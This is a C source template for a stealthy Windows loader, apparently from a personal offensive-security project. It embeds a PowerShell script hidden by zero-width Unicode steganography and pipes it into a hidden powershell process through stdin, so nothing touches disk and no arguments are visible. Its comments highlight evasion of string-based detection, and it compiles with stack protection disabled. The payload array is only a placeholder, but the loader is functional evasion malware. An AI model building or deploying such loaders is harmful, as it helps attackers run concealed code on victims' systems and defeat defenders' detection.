/*
 * ghost_loader_template.c — Steganographic PS1 Loader
 * 22DIV / george wu — CSEC research, own hardware only
 *
 * Embeds a ghost-encoded PS1 (zero-width Unicode steg) as raw bytes.
 * At runtime: pipes payload to powershell stdin. Nothing written to disk.
 * Strings-dump shows invisible Unicode. No socket imports. No cmd.exe string.
 *
 * Generated by build_ghost_loader.py — do not edit directly.
 * Compile: cl.exe ghost_loader_gen.c /Fe:ghost_loader.exe /O1 /GS- /utf-8
 */

#include <windows.h>

/* Embedded ghost payload — zero-width Unicode steg PS1 as raw UTF-8 bytes.
 * Appears blank. PowerShell decodes and executes in memory. */
static const unsigned char PAYLOAD[] = {
    /* PAYLOAD_BYTES */
    0x00
};
static const DWORD PAYLOAD_LEN = sizeof(PAYLOAD) - 1;

int WINAPI WinMain(HINSTANCE hI, HINSTANCE hP, LPSTR lpCmd, int nShow)
{
    SECURITY_ATTRIBUTES sa;
    sa.nLength              = sizeof(sa);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle       = TRUE;

    HANDLE hRead, hWrite;
    if (!CreatePipe(&hRead, &hWrite, &sa, 0))
        return 1;
    SetHandleInformation(hWrite, HANDLE_FLAG_INHERIT, 0);

    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb        = sizeof(si);
    si.dwFlags   = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput = hRead;
    si.hStdOutput = INVALID_HANDLE_VALUE;
    si.hStdError  = INVALID_HANDLE_VALUE;
    si.wShowWindow = SW_HIDE;

    /* powershell reads from stdin — no -File, no -Command args visible */
    wchar_t cmd[] = L"powershell -NoProfile -NonInteractive -WindowStyle Hidden -";

    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE,
                        CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        CloseHandle(hRead);
        CloseHandle(hWrite);
        return 1;
    }

    CloseHandle(hRead);

    DWORD written;
    WriteFile(hWrite, PAYLOAD, PAYLOAD_LEN, &written, NULL);
    CloseHandle(hWrite);

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
